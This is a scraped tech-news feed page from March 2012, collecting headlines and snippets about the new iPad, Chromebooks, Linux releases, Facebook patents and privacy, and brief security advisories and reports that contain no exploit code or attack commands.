We'd normally use this space to give you a little insight into what might happen on this week's edition of the Engadget Podcast but if you're reading this, you probably already know, and Tim's not around this week to tell us how to run things, so we'll just go ahead and do the practical thing here and try to attract a couple new demographics by telling you that this episode of the Engadget Podcast is the perfect companion to waiting in line for The Hunger Games alone after school at the mall for an hour and change.

Host: Brian Heater
Guests: Terrence O'Brien, Billy Steele
Producer: Trent Wolbe
Music: Orbital - Never

00:06:15 - iPad review (2012)
00:15:50 - Apple touts three million new iPads sold since launch
00:22:00 - Apple: don't worry about hot iPad reports, it's cool
00:28:00 - Apple announces dividend and share repurchase program for 2012, expects to spend $45 billion over three years
00:32:44 - Samsung Galaxy Note 10.1 preview (video)
00:40:25 - Samsung Galaxy Tab 7.7 review (Verizon Wireless LTE)
00:48:21 - Wacom Intuos5 touch review
00:53:45 - Samsung Rugby Smart review
00:59:30 - Angry Birds Space now available for download, pigs will fly
01:03:50 - Listener questions

Hear the podcast

Subscribe to the podcast

[iTunes] Subscribe to the Podcast directly in iTunes (enhanced AAC).
[RSS MP3] Add the Engadget Podcast feed (in MP3) to your RSS aggregator and have the show delivered automatically.
[RSS AAC] Add the Engadget Podcast feed (in enhanced AAC) to your RSS aggregator.
[Zune] Subscribe to the Podcast directly in the Zune Marketplace.


Download the podcast

LISTEN (MP3)
LISTEN (AAC)

Contact the podcast


Send your questions to @tim_stevens.
Leave us a voicemail: (423) 438-3005 (GADGET-3005)
E-mail us: podcast at engadget dot com
Twitter: @bheater, @terrenceobrien, @wmsteele

Filed under:

Engadget Podcast 286 - 03.23.2012 originally appeared on Engadget on Fri, 23 Mar 2012 15:08:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image20:01 Icelandic government prepares switch to open source» Linux Today
The H Open: "The new policy is a continuation of efforts to migrate all public institutions to free and open source software."
Channel Image19:56 Review: Kid Icarus: Uprising loses control of an otherwise enjoyable mythological romp» Ars Technica

A control scheme for a game is like the foundation for a house. If it's constructed well, it serves its purpose largely in the background, providing unseen support for the part that people see. But if there's a problem with either a game's control scheme or a house's foundation, it can easily sink the rest of the enterprise, no matter how well it's constructed.

Such is the case with Kid Icarus: Uprising, an imaginative, lighthearted, fun-filled game that ultimately falls on the weakness of some incredibly ill-conceived controls.

Read the rest of this article...

Read the comments on this post


Channel Image19:41 Sony VAIO VCC111 Chromebook passes through FCC, Chrome OS flies its flag» Engadget
Image
Wondering if Chrome OS has a future? Wonder no more. After Samsung and Acer ushered out Chromebooks of their own following Google I/O 2011, it looks as if Sony's planning to usher in one of its own prior to this year's gala. The VAIO VCC111 has just found its way into the FCC's database, signaling that there's only a minimal amount of time before this here machine is cleared for sale on US shelves. So far as we can tell, this is the first significant proof that Sony was (or is) dreaming of involving itself with Google's cloud-centric operating system, with the user guide clearly explaining the boot-up procedure for a "Chrome OS," and the keyboard clearly resembling that seen on the Series 5 from Samsung -- in other words, the Chrome-ified row of hot keys and an omitted Windows key. Judging by the photos, there's also a headphone port, microphone jack, HDMI socket, SD card reader, a pair of USB 2.0 connectors and an 11.6-inch display. We'll be keeping our eyes peeled for more; given where it's at, it shouldn't be long before Best Buy's database picks it up.

Sony VAIO VCC111 Chromebook passes through FCC, Chrome OS flies its flag originally appeared on Engadget on Fri, 23 Mar 2012 14:41:00 EDT. Please see our terms for use of feeds.

Permalink Laptop Reviews  |  sourceFCC  | Email this | Comments
Channel Image19:03 Say hello to Canonical's new Linux desktop: Ubuntu 12.04 beta review» Linux Today
Linux and Open Source: "Ubuntu is based, as ever, on Debian Linux. For its Linux kernel, 12.04 uses the 3.2.6 Linux kernel. Under its Unity desktop hood, you'll find GNOME 3.3.20."
Channel Image19:00 Toshiba AT200 review» Engadget

Toshiba AT200

This waif of a tablet certainly took its sweet time getting here. We first laid eyes on this lightweight beauty last August and while it still hasn't landed in the US just yet (under the guise of the Excite 10 LE) we've brought in the international version -- already in stores in the UK -- to test out the hardware, which appears to be identical. On first appearances, it's an attractive sliver of a slab, due to the magnesium alloy body, of which there isn't much. Measuring in at just 7.7mm thick, we're talking RAZR-scale thinness and a 1.18 pound weigh-in that embarrasses 7-inch devices. Despite this, we still have a 1.2GHz dual-core OMAP processor, running Honeycomb 3.2 on a 10.1 inch touchscreen. But surely, sacrifices must have been made, right? Well, it looks like it's a financial cost that has to be paid. The 16GB version is currently on sale for £399, matching the new iPad in the UK, and likely to arrive in the US at around $530, pricing itself quite a bit above existing, similarly-specced, Android favorites like the Galaxy Tab 10.1. Are you willing to pay a fair chunk of change extra to skim a few millimeters off your tablet profile? Is it worth it? The full story is right after the break.

Continue reading Toshiba AT200 review

Toshiba AT200 review originally appeared on Engadget on Fri, 23 Mar 2012 14:00:00 EDT. Please see our terms for use of feeds.

Permalink   |   | Email this | Comments
Channel Image18:36 Digital gaming soars nine percent, still knows nothing of rarity value» Engadget
Image
It's already chewed up some big names on the retail scene, but the game-downloading trend shows no sign of being sated. Fresh figures from market research firm NPD show that American digital game sales (including rentals and DLC) amounted to $2.04 billion in the fourth quarter of 2011, which represents a nine percent year-on-year hike at a time when physical game transactions fell three percent. Things are going the same way across the Atlantic, with the UK, France and Germany adding a further $1.29 billion to the burgeoning click-to-buy market. Industry types will surely welcome the news, since digital titles rake in higher margins (hello, PS Store) and reduce the trade in used discs, but what about those of us who'll one day want to swap our dusty copy of Fight Night Round Four for something more subtle?

Digital gaming soars nine percent, still knows nothing of rarity value originally appeared on Engadget on Fri, 23 Mar 2012 13:36:00 EDT. Please see our terms for use of feeds.

Permalink SlashGear  |  sourceCNET, NPD  | Email this | Comments
Channel Image18:34 3/23/2012 Daily Hardware Reviews» DailyTech Main News Feed
DailyTech's roundup of hardware reviews from around the web for Friday
Channel Image18:33 Dutch Committee Proposes to Build Steve Jobs' iPad-Equipped Classroom» MacRumors: Mac News and Rumors - Front Page
In his biography of Steve Jobs, Walter Isaacson shared a story of Jobs' meeting with U.S. President Barack Obama. Along with sharing his displeasure at the difficulty in building a factory in the United States, he also disassembled America's education system.
It was absurd, he added that American classrooms were still based on teachers standing at a board and using textbooks. All books, learning materials, and assessments should be digital and interactive, tailored to each student and providing feedback in real time.
Jobs wanted to hire great textbook writers to create digital versions, and make them a feature of the iPad. He wanted to make textbooks free and bundled with the iPad, and believed such a system would give states the opportunity to save money.


A panel of four Dutch educators and politicians is proposing to fulfill Steve Jobs' vision and create a school where students are taught with iPads. The proposal will be presented on Monday [Google Translate] in Amsterdam. The plan, called Education for a New Era, is designed to help students learn "21st century skills" and push the limits of what can be done in a classroom.

It is just a proposal for the time being, but the promoters wish to test existing educational apps and encourage more to be developed. The so-called "Steve Jobs schools" would open their doors in August 2013.

Earlier this year, Apple rolled out a digital textbook initiative. The company partnered with McGraw-Hill, Pearson, and Houghton Mifflin Harcourt -- the three companies together control 90% of the textbook market in the U.S. -- and is focusing on high school textbooks initially. Apple presumably wants to expand the project to include all grade levels, and eventually fulfill Jobs' vision of a digital classroom.


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image18:26 Think twice before installing Chrome extensions» Securelist / Blog

Since November 2011, according to recent statistics, Google Chrome has become the most popular browser in Brazil (more than 45% of the market share).

The same has is true for Facebook, which now is the most popular social network in Brazil, with a total of 42 million users, displacing Orkut.

These two facts are enough to motivate Brazil’s bad guys to turn their attentions to both platforms. This month we saw a huge wave of attacks targeting Brazilian users of Facebook, based on the distribution of malicious extensions. There are several themes used in these attacks, including “Change the color of your profile” and “Discover who visited your profile” and some bordering on social engineering such as “Learn how to remove the virus from your Facebook profile”:

1) Click on Install app, 2) Click on Allow or Continue, 3) Click on Install now, After doing these steps, close the browser and open again

This last one caught our attention not because it asks the user to install a malicious extension, but because the malicious extension it’s hosted at the official Google's Chrome Web Store. If the user clicks on “Install aplicativo” he will be redirected to the official store. The malicious extension presents itself as “Adobe Flash Player”:

Channel Image18:20 Facebook asserts trademark on word "book" in new user agreement» Ars Technica

Facebook is trying to expand its trademark rights over the word "book" by adding the claim to a newly revised version of its "Statement of Rights and Responsibilities," the agreement all users implicitly consent to by using or accessing Facebook.

You may recall that Facebook has launched multiple lawsuits against websites incorporating the word "book" into their names. Facebook, as far as we can tell, doesn't have a registered trademark on "book." But trademark rights can be asserted based on use of a term, even if the trademark isn't registered, and adding the claim to Facebook's user agreement could boost the company's standing in future lawsuits filed against sites that use the word.

Read the rest of this article...

Read the comments on this post


Channel Image18:18 Fingerprint-checking phone patent» BBC News - Technology
Sony files a patent for a smartphone that can scan users' fingerprints through its screen and also offer improved video conference calls.
Channel Image18:16 Next iPhone Coming Fall 2012 with LTE, 3.5-Inch Screen» MacRumors: Mac News and Rumors - Front Page
iMore weighs in with information it has heard about the new iPhone that is due later this year.


According to their sources, the new iPhone will be 4G LTE compatible, as expected. It will also be arriving in the fall, though the exact date will be determined close to the time. Finally, their source also claims that contrary to 4-inch rumors, the new iPhone will retain the same 3.5-inch screen, or very close to it.
So to sum up, iPhone 5,1 is on track for:

- Similar if not same sized screen (currently 3.5-inch but not set in stone)
- 4G LTE radio
- New “micro dock” connector
- Fall/October 2012 release
iMore had previously reported that they believe the new iPhone will carry a miniaturized dock connector to help reduce the overall size of the iPhone, itself.

iMore has recently been the source of some accurate information. Most recently, they pinpointed the announcement date for the iPad 3 and LTE support.


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image18:15 Reportage Sony (8/8) : 3 questions à un responsable de la division TV» 01net. Actualités
Quelle sont les tendances actuelles du monde de la TV ? L'Oled et le Crystal LED c'est pour quand ? Et à quoi ressemblera la télé de 2015 ? Nous avons posé ces questions Hiroshi Sakamoto, un des responsables de la division TV de Sony Japon.


Channel Image18:06 Nouvel iPad, le petit tour des bugs» 01net. Actualités
Surchauffe, mauvaise réception Wi-Fi, housses incompatibles, problèmes de recharge... Les soucis techniques semblent plomber le nouvel iPad. Nous l'avons testé pour en savoir plus.


Channel Image18:00 New Commodore AMIGA mini is a modern PC that comes with Linux» Linux Today
Linux User: The folks behind Commodore USA are still trying to make their mark on modern computing,
Channel Image17:51 Le JT de 01net, l'essentiel de l'actu high tech hebdo en vidéo» 01net. Actualités


Channel Image17:49 Sony Xperia S» Latest Articles

The Xperia S is a large and somewhat ungainly smartphone with a superb screen and some high-end features. However, it's severely let down by its lack of storage expansion and sealed-in battery.

(ZDNet UK - Smartphones)

Channel Image17:48 Nokia updates Maps, Drive and Transport: In pictures» Latest Articles

Nokia has updated its core navigation apps for its Lumia handsets, bringing new features such as full offline voice-guided navigation, public transport directions and speed limit warnings

(ZDNet UK - Mobile Apps)

Channel Image17:46 LTE handset shipments to increase tenfold this year» Home - THE INQUIRER

Pricing is the key to success



Channel Image17:46 HiDPI Retina Images in Mountain Lion, Already Functional in OS X Lion» MacRumors: Mac News and Rumors - Front Page
ArsTechnica reports on the discovery of Retina-sized artwork in OS X Mountain Lion's.
A source with access to the latest Mountain Lion preview alerted Ars that double-sized graphics have popped up in some unexpected places, once again suggesting that Apple may be close to releasing MacBooks with high pixel-density screens.
We'd previously spotted these same Retina-sized graphics in the Lion beta of Apple's new Messages application.

As well, we've found in our testing that Apple's HiDPI mode in Lion is already fully functional and will use the Retina assets appropriately. These screens show the Lion Messages app running in HiDPI mode.


HiDPI mode on OS X 10.7. Left: Retina enabled, Right: Non-Retina

The left image shows that Lion with HiDPI mode enabled uses the full resolution Retina artwork from the Messages app to improve the pixel sharpness of the images. When the Retina assets are selectively removed from the app (right), you can see it fall back to the normal non-Retina images bundled.

Users will be able to test this themselves to full effect when Air Display is updated to support Mac HiDPI mode on the new iPad. Apple's Messages Beta for Lion is one of the few Mac applications that are already Retina-enabled to a large degree. Some elements, such as font rendering will automatically scale upwards as it does on the iPad.


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image17:46 Nicolas Sarkozy veut-il placer le Web sous surveillance ?» 01net. Actualités
La mesure visant à punir pénalement les visiteurs de sites prônant la violence et le terrorisme fait craindre aux défenseurs d'un Internet libre une surveillance accrue du réseau. L'UMP s'en défend.


Channel Image17:43 RIM Loses No. 1 Canadian Smartphone Shipments Spot to Apple for 2011» DailyTech Main News Feed
This is a particularly hard blow to RIM, which is based in Canada and had the No. 1 spot until last year
Channel Image17:04 Winners revealed for PSN connectivity deals» Latest Articles

Virgin Media Business, BT and KCom are among the dozen companies that successfully bid to become suppliers of managed telecoms for the public sector's network of networks

(ZDNet UK - Business of IT)

Channel Image17:00 Nonprofit open source organizations booming» Linux Today
ITworld: Salaries and revenues remain strong for top FLOSS organizations
Channel Image16:58 Mp3tag - v2.50» ToutFr.com - Les traductions mises à jour
Utilitaire pour gérer les étiquettes de nombreux formats audio en masse
Channel Image16:37 VIDEO: Could GPS be used to predict earthquakes?» BBC News - Technology
Professor Kosuke Heki of Hokkaido University in Japan believes he has found a way to predict earthquakes.
Channel Image16:24 Apple Stock Trading Halted Briefly on Sudden 9% Drop» MacRumors: Mac News and Rumors - Front Page
BusinessInsider reports some strange activity on Apple's stock today. Trading was halted due to an abrupt drop of over 9%.
The stock crashed 9% to $542.80 before trading was stopped. When the stock started trading again, it opened at $598.39
Trading has since resumed, but there has been no clarification on what happened. StreetInsider speculates that it was "an apparent errant trade".
Image of drop from WSJ

With news of the dividend and record iPad sales, Apple's stock has been at all time highs in the past week.

Update: Bloomberg pinpoints the issue to a single trade for 100 shares executed by Bats Global Markets Inc.
A single trade for 100 shares executed on a Bats venue briefly sent Apple, the world’s most valuable company, down to $542.80, triggering a circuit breaker that paused the shares. The order was executed at 10:57 a.m. New York time. Two more transactions, which sent the stock back above $598, were made before the halt. The stock stayed around that level once trading resumed.



Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image16:06 HP says it will commit to Linux kernel as mission-critical marketshare rises» Home - THE INQUIRER

Edges out UNIX



Channel Image16:06 HP says it will commit to Linux as mission-critical marketshare rises» Home - THE INQUIRER

Edges out UNIX



Channel Image16:06 HP says it will commit to Linux as mission critical market share rises» Home - THE INQUIRER

Edges out UNIX

Channel Image16:05 Nouvel Amiga, nouvelle NeoGeo : la nostalgie paye toujours autant» ZDNet News
Alors que Commodore relance la mythique marque Amiga, le japonais SNK entend séduire les nostalgeeks avec une nouvelle version portable de l'inoubliable NeoGeo.
Channel Image16:00 Sony Caters to Open Source Community with Android Code» Linux Today
The VAR Guy: Sometimes it's easy to forget that Android is open source and built on Linux.
Channel Image15:57 Privacy is your problem» Home - THE INQUIRER

daveneal

Column

Not your social networking provider's



Channel Image15:57 PS Vita : C2-12828-1, le bug qui n'aime pas les succès» 01net. Actualités
Désagréable surprise pour de nombreux adeptes de la dernière console de Sony : un code erreur, apparu dès sa sortie, qui semble frapper au hasard, et a amené certains utilisateurs agacés à entièrement reformater leur carte mémoire.


Channel Image15:41 Une TV qui obéit au geste et à la voix : la Samsung UE46ES8000» 01net. Actualités
Samsung propose de nouvelles manières de contrôler son téléviseur grâce à la reconnaissance vocale, gestuelle et faciale.


Channel Image15:33 Draw Something is sold to rival» BBC News - Technology
The number one sketching game app is sold to company behind Farmville and Cityville.
Channel Image15:05 Terrorisme et Internet : la mesure de Nicolas Sarkozy bancale juridiquement» ZDNet News
Transposer le principe du droit existant en matière de lutte contre la pédopornographie à la lutte contre le terrorisme, c’est la proposition du président candidat. Mais en quête de suffrages, Nicolas Sarkozy privilégie la communication politique et néglige les questions de faisabilité juridique, voire d’efficacité.
Channel Image15:05 Google Patent Outlines Weather Sensing Advertisements» DailyTech Main News Feed
One more way to spy on you or nice new feature?
Channel Image15:00 VectorLinux 7.0 Light Edition Officially Released» Linux Today
Softpedia: After the release of VectorLinux 7.0 on November 27th, 2011, here comes the Light Edition of the VectorLinux 7.0 Linux operating system, bringing new features and improvements.
Channel Image14:51 Micron reports $244m loss as NOR flash margins tighten» Home - THE INQUIRER

Sees a small rise in NAND and DRAM



Channel Image14:46 Update: Rovio Execs Give Conflicting Statements on Angry Birds Space for Windows Phone» DailyTech Main News Feed
The mobile game developer says it's too much work to technically support it
Channel Image14:43 Apache Wicket XSS vulnerability via pageMapName request parameter - http://wicket.apache.org/2012/03/22/wicket-cve-2012-0047.html, (Fri, Mar 23rd)» SANS Internet Storm Center, InfoCON: green
...(more)...
Channel Image14:36 Samsung's VP for Design Offended by Apple's Allegations of Copying» MacRumors: Mac News and Rumors - Front Page
Reuters profiles Samsung Electronics and their design process in the setting of Apple's ongoing legal battle accusing Samsung of "slavishly copying" Apple's products.

Samsung Mobile's vice president for design Lee Minhyouk takes Apple's charges personally and denies the allegations:
"I've made thousands of sketches and hundreds of prototype products (for the Galaxy). Does that mean I was putting on a mock show for so long, pretending to be designing?"

"As a designer, there's an issue of dignity. (The Galaxy) is original from the beginning, and I'm the one who made it. It's a totally different product with a different design language and different technology infused."
Lee admits that he may not be at the level of Apple's VP for design Jonathan Ive, but believes Samsung "will produce such iconic products one day."

Samsung has proven to be the largest Android smartphone manufacturer and one of Apple's biggest competitors. Samsung is also one of Apple's biggest suppliers and the manufacturer of Apple's 3rd Generation iPad's Retina Display. Apple and Samsung are in an ongoing legal battle over design and patent claims.


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image14:30 Windows 8 Bests Windows 7 in Most Performance Benchmarks» DailyTech Main News Feed
Metro fan or not, Windows 8 is a performer
Channel Image14:19 Free Mobile : une vidéo se moque des problèmes d'appel» 01net. Actualités
Une parodie de la série Bref raille les déboires des utilisateurs de Free Mobile pour fixer par téléphone... un rendez-vous amoureux.


Channel Image14:18 Best Buy Sells Almost as Many iPhones as Apple Retail» MacRumors: Mac News and Rumors - Front Page
AllThingsD reports on findings of a survey by Consumer Intelligence Research Partners which investigated where iPhone owners purchased their device.

The found that the breakdown of retail vs online sales was 76 percent retail vs 24 percent online. Of that 76% from retail stores, the breakdown showed that Best Buy was almost as big as Apple's own retail stores as a point of sale:


Carrier stores are clearly the dominant point of sale for most consumers, but Best Buy's presence has also proven to be a significant location for iPhone sales.
“Apple Stores and the Apple Web site are tremendously productive, but they are limited by their relatively small retail footprint,” CIRP’s Josh Lowitz told AllThingsD. “There are four times as many Best Buy stores, and probably 20 times as many AT&T, Verizon, and Sprint stores, so aggressive distribution through all these channels is critical to Apple’s U.S. strategy.”



Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image14:08 Facebook purchases IBM patents» BBC News - Technology
The social network confirms it has bought intellectual property rights from IBM. The move may help it in a patent dispute with Yahoo.
Channel Image14:03 How to install applications on and update Linpus Lite Desktop 1.7» Linux Today
LinuxBSDos.com: "Unlike any other distribution that I have used or reviewed in recent memory, a new installation of Linpus Lite Desktop 1.7 is virtually without any usable application, other than Firefox 8."
Channel Image13:48 Apple fined €900,000 over warranty sales in Italy» Home - THE INQUIRER

Applecare practices get its hand slapped



Channel Image13:43 'Baldur's Gate: Enhanced Edition' Coming to iPad» MacRumors: Mac News and Rumors - Front Page
The popular 1998 role-playing game Baldur's Gate is seeing a PC remake called Baldur's Gate: Enhanced Edition by Overhaul Games.


The company has since announced that the new version will also be available for iPad and be available in the summer of 2012.

IGN has already had some hands on time with an early build.
The iPad port will include all the improvements and additions found in the PC version, including full integration of the Tales of the Sword Coast expansion pack. The title is also running on the refined Baldur's Gate II Infinity Engine, allowing gamers to experience the original adventure with the sequel's refined graphics options and other engine tweaks.
IGN reports that the new version of thegame will feature new content, more quests and a new party member. The early build of the iPad version runs smoothly though the interface has not yet been revamped to be more touch friendly. Those changes are still in the works, though pinch and zoom has already been implemented. The iPad version is expected to launch this summer.


Recent Mac and iOS Blog Stories
Apple Loses Appeal in Italian Warranty Disclosures Case
Steve Jobs Tried to Hire Linux Creator Linus Torvalds to Work on OS X
Some Smart Covers Not Working Properly on New iPad
Angry Birds Space Launches on iOS and Mac
More '4G' Strings Found in iOS 5.1


Channel Image13:42 Emploi : Monster est à vendre» ZDNet News
Le PDG de Monster se dit prêt à étudier une vente totale ou partielle de l’entreprise, aussi bien un acteur de l’Internet qu’une société d’investissement.
Channel Image13:37 Que vont devenir les 25 pétaoctets de données de Megaupload ?» 01net. Actualités
L'hébergeur de Megaupload veut se débarrasser des données du site. Cela lui coûte 9 000 dollars par jour. Le gouvernement américain, la MPAA et l'EFF refusent, mais chacun a ses raisons.


Channel Image13:31 Facebook's quiet privacy shift prompts protests» Latest Articles

A week-long consultation over a series of changes to Facebook's terms and conditions yielded tens of thousands of German responses, but very few in other languages

(ZDNet UK - Security)

Channel Image13:25 Sony Xperia S review» Home - THE INQUIRER

Sony Xperia S Android Smartphone

Crisp display and fast performance, but let down by poor battery life



Channel Image13:12 LibreOffice en version Web en 2013, non avril prochain» ZDNet News
Correctif : Dès avril, la Document Foundation prévoit de présenter la feuille de route du développement d'une version Cloud de LibreOffice, des services en ligne qui complèteront le client logiciel lourd actuel. Une version Android verra aussi le jour, au plus tôt en 2013.
Channel Image13:06 Spies 'penetrate' US army network» BBC News - Technology
Foreign spies have comprehensively penetrated the computer networks of the US government, American politicians have been told.
Channel Image13:03 VIDEO: The wireless charging revolution» BBC News - Technology
From a toy that charges in its toy box to an electric car that charges as it's driven, Dan Simmons investigates just how far we can take the idea of wireless power.
Channel Image13:01 Mozilla on H.264: Mobile matters most» Linux Today
IT World: "Eich outlined a pretty solid case for why Mozilla felt it had to submit to market pressures and implement H.264. It came down to two core reasons."
Channel Image12:58 Téléchargement : les dix meilleurs logiciels de la semaine» 01net. Actualités
La rédaction vous propose sa sélection hebdomadaire de nouveaux logiciels et de mises à jour. Retrouvez dans l'édition du 23 mars 2012 : CorelDraw Graphics Suite, Internet Download Manager, Adobe Photoshop CS6, Slowin Killer, etc.


Channel Image12:46 Online video is overtaking physical sales» Home - THE INQUIRER

Americans will spend more online than in stores



Channel Image12:33 The Economist Debate on Airplane Security» Schneier on Security
On The Economist website, I am currently debating Kip Hawley on airplane security. On Tuesday we posted our initial statements, and today (London time) we posted our rebuttals. We have one more round to go. I've set it up to talk about the myriad of harms airport security has caused: loss of trust in government, increased fear, creeping police state,...
Channel Image12:33 Règles de confidentialité : Google attaqué en justice» ZDNet News
Déjà accusées de ne pas respecter le droit européen, les nouvelles règles de confidentialité de Google font l’objet de deux plaintes aux Etats-Unis, qui pourraient devenir à terme des procédures en action collective.
Channel Image12:33 Facebook buys 750 IBM patents» Home - THE INQUIRER

Updated

The social network prepares for a patents war with Yahoo



Channel Image12:24 Mandriva: 2012:037: cyrus-imapd » LinuxSecurity.com - Security Advisories
LinuxSecurity.com: A vulnerability has been found and corrected in cyrus-imapd: The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and [More...]
Channel Image12:15 Public services get three years to go 'digital by default'» Latest Articles

Government services will be online by default in the future, and must be easy enough for the minister responsible to use, under new measures announced in the 2012 UK Budget

(ZDNet UK - Business of IT)

Channel Image12:12 Fichiers des « gens honnêtes » et dérive sécuritaire : le gouvernement rappelé à l’ordre» ZDNet News
La base de données centralisée défendue par le gouvernement et son ministre de l’intérieur Claude Guéant a été jugée contraire à la Constitution. Le Conseil constitutionnel a considéré que la loi portait au droit au respect de la vie privée une atteinte non proportionnée au but poursuivi.
Channel Image12:03 Using ATA Over Ethernet (AoE) On Debian Squeeze (Initiator And Target)» Linux Today
HowtoForge: "This guide explains how you can set up an AoE target and an AoE initiator (client), both running Debian Squeeze."
Channel Image11:58 VIDEO: Server drones and other tech news» BBC News - Technology
File sharing site The Pirate Bay have announced plans to use GPS controlled drones to redirect traffic to servers at secret locations.
Channel Image11:47 Apple knocks RIM off smartphone top spot in Canada» Home - THE INQUIRER

Blackberry maker gets beaten in its own back yard



Channel Image11:47 Forfaits mobiles : moins cher peut-il rimer avec moins bien ?» 01net. Actualités
Des forfaits mobiles moins chers, c'est une bonne nouvelle. Mais quand ils offrent moins de services et une qualité de fonctionnement dégradée, les choses se compliquent. Êtes-vous prêt à accepter une dégradation de la qualité quand vous payez moins cher ?


Channel Image11:30 Mandriva: 2012:036: libsoup » LinuxSecurity.com - Security Advisories
LinuxSecurity.com: A vulnerability has been found and corrected in libsoup: Directory traversal vulnerability in soup-uri.c in SoupServer in libsoup before 2.35.4 allows remote attackers to read arbitrary files via a \%2e\%2e (encoded dot dot) in a URI (CVE-2011-2524). [More...]
Channel Image11:27 US Congress probes iOS app makers over privacy» Latest Articles

US congressmen have sent letters to Apple boss Tim Cook and 33 iOS app makers as they extend their probe of privacy policies concerning mobile apps

(ZDNet UK - Security)

Channel Image11:19 Legal battle over Megaupload data» BBC News - Technology
Legal action starts to force a decision about what to do with 25 petabytes of data from closed file-sharing site Megaupload.
Channel Image11:15 Angry users bite Apple over poor WiFi on the new Ipad» Home - THE INQUIRER

Company faces a barrage of criticism



Channel Image11:11 AUDIO: Enigma's Spanish Civil War role» BBC News - Technology
Security correspondent Gordon Corera reports on how the Spanish Ministry of Defence has given Britain two unique Enigma cipher machines, dating back to the Spanish Civil War.
Channel Image11:06 Nous avons testé le réseau mobile 4G» 01net. Actualités
Conviés par Bouygues Telecom, nous avons pu tester in situ la nouvelle norme 4G qui équipera nos smartphones dans le courant de l'année 2013. Les usages que nous avons de nos appareils mobiles risquent d'en être bouleversés...


Channel Image11:03 Windows 8 to support iPad-style Retina display» Latest Articles

If manufacturers follow suit, Windows 8 tablets and hybrids will sport displays that rival, or exceed, the Retina Display on Apple's new iPad, Microsoft has said

(ZDNet UK - Desktop OS)

Channel Image11:03 Facebook postpones privacy changes» Home - THE INQUIRER

Updated

Needs time to digest responses



Channel Image10:57 Les GeForce GTX 680 débarquent» HardWare.fr
Channel Image10:41 SSD Intel : en route vers le 20nm et 1.6 To» HardWare.fr
Channel Image10:39 VIDEO: Webscape: Your music in the cloud» BBC News - Technology
Kate Russell looks at how to sync your music to any platform - mobile or desktop.
Channel Image10:38 Man will plead guilty to celebrity hacking charges» Home - THE INQUIRER

Faces 60 years



Channel Image09:41 Garantie AppleCare : culpabilité et condamnation confirmées pour Apple en Italie» ZDNet News
La justice italienne avait infligé cette amende à Apple fin 2011 pour avoir proposé son extension de garantie payante AppleCare sans avertir les consommateurs que la loi leur accordait deux ans de garantie produit.
Channel Image09:29 Alternatives à Google : les métamoteurs, aussi !» Denis Szalkowski Formateur Consultant
En termes de métamoteurs, Copernic, Ixquick et Yippy me semblent sortir du lot. Maintenant, c'est vous qui voyez ! ;+)

Dsfc Dsfc Dsfc sur Tout le Monde en Blogue

Channel Image09:14 VIDEO: Smartphone app identifies potholes» BBC News - Technology
A new piece of technology called Street Bump could use a mobile phone to identify potholes, and sends the information directly to local councils.
Channel Image09:04 Facebook doit décaler l’application de sa nouvelle politique de confidentialité» ZDNet News
La nouvelle politique de confidentialité de Facebook, qui selon le réseau social ne modifie en rien les règles actuelles d’utilisation des données, devait entrer en vigueur le 22 mars. Mais face aux critiques, Facebook doit temporiser.
Channel Image08:58 It's Official: OpenBSD Helps Me Do Better Science» OpenBSD Journal
Kristaps Dzonsons wrote in with an article about how OpenBSD helps him produce better research. Kristaps writes,

It's no secret that OpenBSD is an excellent research platform. From packages(7) for specialised software to out-of-the-box httpd(8), sshd(8), and so on, it's a no-brainer to pop OpenBSD onto a workstation and just get to work.

In this article, I explore how OpenBSD's clean code and sane defaults recently saved the day. For great science!
Read more...
Channel Image08:36 Facebook aurait acheté 750 brevets à IBM» ZDNet News
Les brevets couvrent diverses technologies logicielles et réseau. Ils pourraient aider Facebook à se défendre, notamment dans le procès pour violation de brevets initiés par Yahoo.
Channel Image08:34 Windows 8 s’adapte aux tablettes à écran haute définition» ZDNet News
Windows 8 veut s’afficher sur toutes les tailles d’écran et jusqu’à de très hautes définitions, notamment sur des tablettes de 10 pouces équipées d’écran Retina. Microsoft souhaite rester dans la roue d’Apple.
Channel Image08:11 En 2012, Le Robert devient cyberdépendant» 01net. Actualités
EN BREF. L'édition estampillée 2013 du célèbre dictionnaire s'enrichit comme il se doit de nouveaux termes et personnes. Outre l'entrée de Jean Dujardin, le livre de chevet d'Alain Rey accueille cette année le terme cyberdépendance.


Channel Image08:05 MegaUpload : 25 petabytes de données menacés de suppression» ZDNet News
Contraint, pour un coût quotidien de 9.000 dollars, de préserver les données et serveurs ayant appartenu à MegaUpload, l’hébergeur Carpathia Hosting demande à la justice à être déchargé de cette obligation.
Channel Image07:48 Mandriva: 2012:035: file » LinuxSecurity.com - Security Advisories
